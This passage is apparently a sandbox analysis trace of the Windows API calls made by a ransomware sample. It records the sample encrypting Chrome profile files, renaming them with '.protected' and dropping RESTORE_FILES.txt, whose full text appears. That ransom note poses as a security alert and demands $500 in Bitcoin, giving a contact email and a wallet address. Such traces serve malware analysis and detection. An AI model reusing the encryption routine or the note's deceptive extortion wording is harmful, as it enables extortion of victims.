(lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".protected") returned 0x0 [0084.494] lstrcmpW (lpString1="Safe Browsing Channel IDs-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.494] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.494] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0084.495] StrStrW (lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".txt") returned 0x0 [0084.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0084.495] StrStrW (lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".rar") returned 0x0 [0084.495] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0084.495] StrStrW (lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".zip") returned 0x0 [0084.495] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.495] SetFilePointerEx (in: hFile=0x150, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.495] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.495] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.495] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.496] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.496] CloseHandle (hObject=0x150) returned 1 [0084.496] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.protected") returned 115 [0084.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal.protected")) returned 1 [0084.497] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", 
lpString2="Windows") returned -1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="Program Files") returned 1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="Program Files (x86)") returned 1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="$Recycle.bin") returned 1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="System Volume Information") returned -1 [0084.497] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0084.497] StrStrIW (lpFirst="Safe Browsing Cookies", lpSrch=".protected") returned 0x0 [0084.497] lstrcmpW (lpString1="Safe Browsing Cookies", lpString2="RESTORE_FILES.txt") returned 1 [0084.497] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.497] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0084.497] StrStrW (lpFirst="Safe Browsing Cookies", lpSrch=".txt") returned 0x0 [0084.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0084.497] StrStrW (lpFirst="Safe Browsing Cookies", 
lpSrch=".rar") returned 0x0 [0084.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0084.497] StrStrW (lpFirst="Safe Browsing Cookies", lpSrch=".zip") returned 0x0 [0084.497] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1c00, lpOverlapped=0x0) returned 1 [0084.500] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe400, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.500] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1c00, lpOverlapped=0x0) returned 1 [0084.500] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.500] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.500] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.500] CloseHandle (hObject=0x150) returned 1 [0084.501] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies.protected") returned 103 [0084.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies.protected")) returned 1 [0084.501] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="Windows") returned -1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="Program Files") returned 1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="Program Files (x86)") returned 1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="$Recycle.bin") returned 1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="System Volume Information") returned -1 [0084.501] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0084.501] StrStrIW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".protected") returned 0x0 [0084.501] lstrcmpW (lpString1="Safe Browsing Cookies-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.501] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.501] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing 
cookies-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0084.502] StrStrW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".txt") returned 0x0 [0084.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0084.502] StrStrW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".rar") returned 0x0 [0084.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0084.502] StrStrW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".zip") returned 0x0 [0084.502] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.502] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.502] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.503] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.503] CloseHandle (hObject=0x150) returned 1 [0084.503] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.protected") returned 111 [0084.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal.protected")) returned 1 [0084.503] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="Windows") returned -1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="Program Files") returned 1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="Program Files (x86)") returned 1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="$Recycle.bin") returned 1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="System Volume Information") returned -1 [0084.503] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 89 [0084.503] lstrcmpW (lpString1="SSLErrorAssistant", lpString2=".") returned 1 [0084.504] lstrcmpW (lpString1="SSLErrorAssistant", lpString2="..") returned 1 [0084.504] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*") returned 91 [0084.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.504] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.504] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.504] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.504] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.504] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.504] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\.") returned 91 [0084.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.504] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.504] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.504] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.504] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.504] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.504] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.504] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\..") returned 92 [0084.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.504] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) 
returned 0 [0084.504] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.504] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\RESTORE_FILES.txt") returned 107 [0084.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.505] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.505] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.506] lstrlenA (lpString="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") returned 684 [0084.506] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.506] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.506] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.506] CloseHandle (hObject=0x150) returned 1 [0084.506] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="Windows") returned -1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="Program Files") returned 1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="Program Files (x86)") returned 1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="$Recycle.bin") returned 1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="System Volume Information") returned -1 [0084.506] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 82 [0084.506] lstrcmpW (lpString1="SwReporter", lpString2=".") returned 1 [0084.506] lstrcmpW (lpString1="SwReporter", lpString2="..") returned 1 [0084.506] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*") returned 84 [0084.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.506] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.506] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.506] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.506] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.506] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.506] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\.") returned 84 [0084.507] 
lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.507] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.507] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.507] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.507] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.507] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.507] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.507] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\..") returned 85 [0084.507] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.507] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.507] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.507] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\RESTORE_FILES.txt") returned 100 [0084.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\swreporter\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.507] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.507] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.508] lstrlenA (lpString="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") returned 684 [0084.508] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.508] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.508] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.508] CloseHandle (hObject=0x150) returned 1 [0084.508] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="Windows") returned -1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="Program Files") returned 1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="Program Files (x86)") returned 1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="$Recycle.bin") returned 1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="System Volume Information") returned 1 [0084.508] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 83 [0084.508] lstrcmpW (lpString1="WidevineCdm", lpString2=".") returned 1 [0084.508] lstrcmpW (lpString1="WidevineCdm", lpString2="..") returned 1 [0084.508] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*") returned 85 [0084.508] FindFirstFileW (in: 